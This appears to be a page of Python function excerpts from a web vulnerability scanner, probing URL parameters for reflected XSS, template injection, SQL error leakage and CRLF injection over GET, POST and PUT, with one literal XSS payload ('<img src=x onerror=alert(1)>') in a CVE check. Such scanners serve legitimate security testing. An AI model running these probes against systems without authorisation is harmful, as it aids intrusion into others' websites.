Exemplo n.º 1
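 def Put(url):
     """Probe each query parameter of *url* for reflected XSS over PUT.

     The query string is sent as the PUT body.  Every entry of
     ``xss_payloads`` is appended to every ``name=value`` pair in turn and
     the request is replayed; a finding is reported through ``show.bug``
     when the raw payload bytes come back in the response body.

     Returns the finding dict for the first reflected payload, or ``None``
     when a pre-check did not return 1 or nothing was reflected.

     NOTE(review): byte-for-byte reflection is a heuristic.  It does not
     show that the payload lands in an executable context, so a finding
     still needs manual confirmation before it is triaged as XSS.
     """
     base = url.split('?')[0]
     # refxss.Put is consulted only when methods.Put returned 1, exactly as
     # in the previous if/elif chain (short-circuit `or`).
     if methods.Put(base, urlparse(url).query) != 1 or refxss.Put(url) != 1:
         return None
     for param in url.split('?')[1].split('&'):
         for payload in xss_payloads:
             # NOTE(review): str.replace rewrites every occurrence of the
             # "name=value" text in the URL, not only this parameter.
             data = urlparse(url.replace(param, param + payload)).query
             # 0 from post_data / nq.Put presumably signals failure; the
             # rest of this parameter's payloads are skipped in that case.
             if post_data(data) == 0:
                 break
             req = nq.Put(base, post_data(data))
             if req == 0:
                 break
             if payload.encode('utf-8') not in req.content:
                 continue
             bug = {
                 # Fixed spelling ("Corss-site") so the returned record
                 # matches the name passed to show.bug below.
                 'name': 'Cross-site scripting',
                 'payload': payload,
                 'method': 'PUT',
                 'parameter': param,
                 'target': base,
                 'data': data
             }
             show.bug(bug='Cross-site scripting',
                      payload=payload,
                      method='PUT',
                      parameter=param,
                      target=base,
                      link=data)
             return bug
     return None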
Exemplo n.º 2
 def Get(url):
     """Probe each query parameter of *url* for template injection over GET.

     For every parameter and every ``payload -> message`` pair in
     ``ssti_payloads`` the unmodified URL is fetched, then the URL with the
     encoded payload appended to the parameter.  A finding is reported when
     ``message`` matches more often in the second response than in the
     first.

     Returns the finding dict on the first hit, otherwise ``None`` (also
     when ``methods.Get(url)`` is not 1).
     """
     if methods.Get(url) != 1:
         return None
     for param in url.split('?')[1].split('&'):
         for payload, message in ssti_payloads.items():
             baseline = nq.Get(url)
             if baseline == 0:
                 # 0 presumably means the request failed; give up on this
                 # parameter.
                 break
             # findall treats the message as a regular expression.
             marker = message.encode('utf-8')
             hits_before = len(findall(marker, baseline.content))
             probe = nq.Get(url.replace(param, param + en(payload)))
             if probe == 0:
                 break
             hits_after = len(findall(marker, probe.content))
             if hits_before >= hits_after:
                 continue
             bug = {
                 'name': 'template injection',
                 'payload': payload,
                 'method': 'GET',
                 'parameter': param,
                 'link': url.replace(param, param + en(payload)),
                 'target': url.split('?')[0]
             }
             show.bug(bug='template injection',
                      payload=payload,
                      method='GET',
                      parameter=param,
                      link=url.replace(param, param + en(payload)))
             return bug
     return None
Exemplo n.º 3
 def Put(url):
     """Probe each query parameter of *url* for template injection over PUT.

     The query string is sent as the PUT body.  For every parameter and
     every ``payload -> message`` pair in ``ssti_payloads`` a baseline
     request with the original body is compared against one whose
     parameter has the payload appended; more matches of ``message`` in the
     second response is reported as a finding.

     Returns the finding dict on the first hit, otherwise ``None`` (also
     when ``methods.Put(url)`` is not 1).
     """
     if methods.Put(url) != 1:
         return None
     base = url.split('?')[0]
     for param in url.split('?')[1].split('&'):
         for payload, message in ssti_payloads.items():
             original_query = urlparse(url).query
             # A 0 result presumably signals failure; stop testing this
             # parameter.
             if post_data(original_query) == 0:
                 break
             baseline = nq.Put(base, post_data(original_query))
             if baseline == 0:
                 break
             # findall treats the message as a regular expression.
             marker = message.encode('utf-8')
             hits_before = len(findall(marker, baseline.content))
             data = urlparse(url.replace(param, param + payload)).query
             probe = nq.Put(base, post_data(data))
             if probe == 0:
                 break
             if hits_before >= len(findall(marker, probe.content)):
                 continue
             bug = {
                 'name': 'template injection',
                 'payload': payload,
                 'method': 'PUT',
                 'parameter': param,
                 'target': base,
                 'data': data
             }
             show.bug(bug='template injection',
                      payload=payload,
                      method='PUT',
                      parameter=param,
                      target=base,
                      link=data)
             return bug
     return None
Exemplo n.º 4
 def Put(url):
     """Probe each query parameter of *url* for SQL error leakage over PUT.

     A baseline PUT with the original body is stored through
     ``save_request``; a second PUT carries the body with a ``sqli_payloads``
     entry appended to the parameter.  Each pattern in ``sql_err`` is then
     counted in both responses, and a finding is reported when the second
     response contains more matches.

     Returns the finding dict on the first hit, otherwise ``None``.
     """
     base = url.split('?')[0]
     for param in url.split('?')[1].split('&'):
         for payload in sqli_payloads:
             original_query = urlparse(url).query
             # A 0 result presumably signals failure; stop testing this
             # parameter.
             if post_data(original_query) == 0:
                 break
             # NOTE(review): the baseline goes to the full URL (query
             # included) while the probe below goes to the bare path;
             # confirm the difference is intended.
             baseline = nq.Put(url, post_data(original_query))
             if baseline == 0:
                 break
             save_request.save(baseline)
             data = urlparse(url.replace(param, param + payload)).query
             probe = nq.Put(base, post_data(data))
             if probe == 0:
                 break
             for _label, pattern in sql_err.items():
                 needle = pattern.encode('utf-8')
                 before = findall(needle, save_request.get().content)
                 after = findall(needle, probe.content)
                 if len(before) >= len(after):
                     continue
                 bug = {
                     'name': 'SQL injection',
                     'payload': payload,
                     'method': 'PUT',
                     'parameter': param,
                     'target': base,
                     'data': data
                 }
                 show.bug(bug='SQL injection',
                          payload=payload,
                          method='PUT',
                          parameter=param,
                          target=base,
                          link=data)
                 return bug
     return None
Exemplo n.º 5
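 def Get(url):
     """Probe each query parameter of *url* for reflected XSS over GET.

     Every entry of ``xss_payloads`` is encoded with ``en`` and appended to
     every ``name=value`` pair in turn; a finding is reported through
     ``show.bug`` when the raw (unencoded) payload bytes come back in the
     response body.

     Returns the finding dict for the first reflected payload, or ``None``
     when a pre-check did not return 1 or nothing was reflected.

     NOTE(review): byte-for-byte reflection is a heuristic.  It does not
     show that the payload lands in an executable context, so a finding
     still needs manual confirmation before it is triaged as XSS.
     """
     # refxss.Get is consulted only when methods.Get returned 1, exactly as
     # in the previous if/elif chain (short-circuit `or`).
     if methods.Get(url) != 1 or refxss.Get(url) != 1:
         return None
     for param in url.split("?")[1].split("&"):
         for payload in xss_payloads:
             # NOTE(review): str.replace rewrites every occurrence of the
             # "name=value" text in the URL, not only this parameter.
             link = url.replace(param, param + en(payload))
             req = nq.Get(link)
             if req == 0:
                 # 0 presumably means the request failed; try the next
                 # payload, as the original did.
                 continue
             if payload.encode('utf-8') not in req.content:
                 continue
             bug = {
                 # Fixed spelling ("Corss-site") so the returned record
                 # matches the name passed to show.bug below.
                 'name': 'Cross-site scripting',
                 'payload': payload,
                 'method': 'GET',
                 'parameter': param,
                 'link': link
             }
             show.bug(bug='Cross-site scripting',
                      payload=payload,
                      method='GET',
                      parameter=param,
                      link=link)
             return bug
     return None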
Exemplo n.º 6
 def Post(url):
     """Probe each query parameter of *url* for SQL error leakage over POST.

     A baseline POST with the original body is stored through
     ``save_request``; a second POST carries the body with a
     ``sqli_payloads`` entry appended to the parameter.  Each pattern in
     ``sql_err`` is counted in both responses and a finding is printed via
     ``show.bug`` when the second response contains more matches.

     Nothing is returned.
     """
     base = url.split('?')[0]
     for param in url.split('?')[1].split('&'):
         for payload in sqli_payloads:
             original_query = urlparse(url).query
             # A 0 result presumably signals failure; stop testing this
             # parameter.
             if post_data(original_query) == 0:
                 break
             baseline = nq.Post(url, post_data(original_query))
             if baseline == 0:
                 break
             save_request.save(baseline)
             data = urlparse(url.replace(param, param + payload)).query
             probe = nq.Post(base, post_data(data))
             if probe == 0:
                 break
             for _label, pattern in sql_err.items():
                 needle = pattern.encode('utf-8')
                 before = findall(needle, save_request.get().content)
                 after = findall(needle, probe.content)
                 if len(before) >= len(after):
                     continue
                 show.bug(bug='SQL injection',
                          payload=payload,
                          method='POST',
                          parameter=param,
                          target=base,
                          link=data)
                 # NOTE(review): this leaves only the pattern loop, so the
                 # remaining payloads are still tried against this
                 # parameter and may report it again.
                 break
Exemplo n.º 7
 def Get(url):
     """Probe each query parameter of *url* for SQL error leakage over GET.

     The unmodified URL is fetched and stored through ``save_request``;
     then the URL with a ``sqli_payloads`` entry appended to the parameter
     is fetched.  Each pattern in ``sql_err`` is counted in both responses
     and a finding is reported when the second one contains more matches.

     Returns the finding dict on the first hit, otherwise ``None``.
     """
     base = url.split('?')[0]
     for param in url.split('?')[1].split('&'):
         for payload in sqli_payloads:
             baseline = nq.Get(url)
             if baseline == 0:
                 # 0 presumably means the request failed; give up on this
                 # parameter.
                 break
             save_request.save(baseline)
             # NOTE(review): the request carries the raw payload, while the
             # reported link below uses en(payload); the two URLs can
             # differ.
             probe = nq.Get(url.replace(param, param + payload))
             if probe == 0:
                 break
             for _label, pattern in sql_err.items():
                 needle = pattern.encode('utf-8')
                 before = findall(needle, save_request.get().content)
                 after = findall(needle, probe.content)
                 if len(before) >= len(after):
                     continue
                 bug = {
                     'name': 'SQL injection',
                     'payload': payload,
                     'method': 'GET',
                     'parameter': param,
                     'link': url.replace(param, param + en(payload)),
                     'target': base
                 }
                 show.bug(bug='SQL injection',
                          payload=payload,
                          method='GET',
                          parameter=param,
                          target=base,
                          link=url.replace(param, param + en(payload)))
                 return bug
     return None
Exemplo n.º 8
 def Get(url):
     """Probe each query parameter of *url* for CRLF injection over GET.

     Every entry of ``crlf_payloads`` is encoded with ``en`` and appended
     to every ``name=value`` pair in turn.  A finding is reported when the
     response carries a non-empty ``Header-Test`` header.

     Returns the finding dict on the first hit, otherwise ``None``.
     """
     for param in url.split('?')[1].split('&'):
         for payload in crlf_payloads:
             resp = nq.Get(url.replace(param, param + en(payload)))
             if resp == 0:
                 # 0 presumably means the request failed; give up on this
                 # parameter.
                 break
             # NOTE(review): any truthy Header-Test value counts; the value
             # itself is not compared against what the payload injected.
             if not resp.headers.get('Header-Test'):
                 continue
             # CR/LF are shown percent-encoded so the report stays on one
             # line.
             printable = payload.replace('\n', '%0a').replace('\r', '%0d')
             bug = {
                 'name': 'CRLF injection',
                 'payload': printable,
                 'method': 'GET',
                 'parameter': param,
                 'link': url.replace(param, param + en(payload)),
                 'target': url.split('?')[0]
             }
             show.bug(bug='CRLF injection',
                      payload=printable,
                      method='GET',
                      parameter=param,
                      link=url.replace(param, param + en(payload)))
             return bug
     return None
Exemplo n.º 9
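def NEON_CVE(url):
    """Check the paths derived from *url* for a reflected ``q`` parameter.

    ``add_path(url)`` supplies the URLs to test.  Each one receives a POST
    whose body is built from a fixed ``q=`` marker, and a finding is
    printed through ``show.bug`` when the marker comes back unmodified in
    the response body.  Nothing is returned.
    """
    marker = '<img src=x onerror=alert(1)>'
    body = 'q=' + marker
    for u in add_path(url):
        r = nq.Post(u, post_data(body))
        # The other nq callers on this page compare the result with 0
        # before touching it (presumably a failed request); without this
        # guard a failure would raise AttributeError on `.content`.
        if r == 0:
            continue
        if marker.encode('utf-8') in r.content:
            show.bug(bug='Cross-site scripting',
                     payload=marker,
                     # The probe is sent with nq.Post; the report used to
                     # say 'GET'.
                     method='POST',
                     parameter='q',
                     target=u,
                     link=body)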
Exemplo n.º 10
 def Get(url):
     """Probe each query parameter of *url* for reflected XSS over GET.

     Every entry of ``xss_payloads`` is encoded with ``en`` and appended to
     every ``name=value`` pair in turn.  When the raw payload bytes appear
     in the response body the finding is printed via ``show.bug`` and the
     scan moves on to the next parameter.  Nothing is returned.
     """
     for param in url.split("?")[1].split("&"):
         for payload in xss_payloads:
             resp = nq.Get(url.replace(param, param + en(payload)))
             if resp == 0:
                 # 0 presumably means the request failed; try the next
                 # payload.
                 continue
             if payload.encode('utf-8') not in resp.content:
                 continue
             show.bug(bug='Cross-site scripting',
                      payload=payload,
                      method='GET',
                      parameter=param,
                      link=url.replace(param, param + en(payload)))
             # One finding per parameter is enough.
             break
Exemplo n.º 11
 def Get(url):
     """Probe each query parameter of *url* for CRLF injection over GET.

     Every entry of ``crlf_payloads`` is encoded with ``en`` and appended
     to every ``name=value`` pair in turn.  A finding is printed via
     ``show.bug`` when the response's ``Header-Test`` header equals
     ``'BLATRUC'``.  Nothing is returned.
     """
     for param in url.split('?')[1].split('&'):
         for payload in crlf_payloads:
             resp = nq.Get(url.replace(param, param + en(payload)))
             if resp == 0:
                 # 0 presumably means the request failed; give up on this
                 # parameter.
                 break
             if 'BLATRUC' != resp.headers.get('Header-Test'):
                 continue
             # No break here: the remaining payloads are still tried and
             # can report the same parameter again.
             show.bug(bug='CRLF injection',
                      # CR/LF are shown percent-encoded in the report.
                      payload=payload.replace('\n', '%0a').replace(
                          '\r', '%0d'),
                      method='GET',
                      parameter=param,
                      link=url.replace(param, param + en(payload)))
Exemplo n.º 12
 def Get(url):
     """Probe each query parameter of *url* for template injection over GET.

     For every parameter and every ``payload -> message`` pair in
     ``ssti_payloads`` the unmodified URL is fetched, then the URL with the
     encoded payload appended to the parameter.  When ``message`` matches
     more often in the second response the finding is printed via
     ``show.bug`` and the scan moves on to the next parameter.  Nothing is
     returned.
     """
     for param in url.split('?')[1].split('&'):
         for payload, message in ssti_payloads.items():
             baseline = nq.Get(url)
             if baseline == 0:
                 # 0 presumably means the request failed; give up on this
                 # parameter.
                 break
             # findall treats the message as a regular expression.
             marker = message.encode('utf-8')
             hits_before = len(findall(marker, baseline.content))
             probe = nq.Get(url.replace(param, param + en(payload)))
             if probe == 0:
                 break
             if hits_before >= len(findall(marker, probe.content)):
                 continue
             show.bug(bug='template injection',
                      payload=payload,
                      method='GET',
                      parameter=param,
                      link=url.replace(param, param + en(payload)))
             break
Exemplo n.º 13
 def Put(url):
     """Probe each query parameter of *url* for reflected XSS over PUT.

     The query string is sent as the PUT body.  Every entry of
     ``xss_payloads`` is appended to every ``name=value`` pair in turn;
     when the raw payload bytes appear in the response body the finding is
     printed via ``show.bug`` and the scan moves on to the next parameter.
     Nothing is returned.
     """
     base = url.split('?')[0]
     for param in url.split('?')[1].split('&'):
         for payload in xss_payloads:
             data = urlparse(url.replace(param, param + payload)).query
             # A 0 result presumably signals failure; stop testing this
             # parameter.
             if post_data(data) == 0:
                 break
             resp = nq.Put(base, post_data(data))
             if resp == 0:
                 break
             if payload.encode('utf-8') not in resp.content:
                 continue
             show.bug(bug='Cross-site scripting',
                      payload=payload,
                      method='PUT',
                      parameter=param,
                      target=base,
                      link=data)
             break
Exemplo n.º 14
 def Post(url):
     """Probe each query parameter of *url* for template injection over POST.

     The query string is sent as the POST body.  For every parameter and
     every ``payload -> message`` pair in ``ssti_payloads`` a baseline
     request with the original body is compared against one whose
     parameter has the payload appended.  When ``message`` matches more
     often in the second response the finding is printed via ``show.bug``
     and the scan moves on to the next parameter.  Nothing is returned.
     """
     base = url.split('?')[0]
     for param in url.split('?')[1].split('&'):
         for payload, message in ssti_payloads.items():
             original_query = urlparse(url).query
             # A 0 result presumably signals failure; stop testing this
             # parameter.
             if post_data(original_query) == 0:
                 break
             baseline = nq.Post(base, post_data(original_query))
             if baseline == 0:
                 break
             # findall treats the message as a regular expression.
             marker = message.encode('utf-8')
             hits_before = len(findall(marker, baseline.content))
             data = urlparse(url.replace(param, param + payload)).query
             probe = nq.Post(base, post_data(data))
             if probe == 0:
                 break
             if hits_before >= len(findall(marker, probe.content)):
                 continue
             show.bug(bug='template injection',
                      payload=payload,
                      method='POST',
                      parameter=param,
                      target=base,
                      link=data)
             break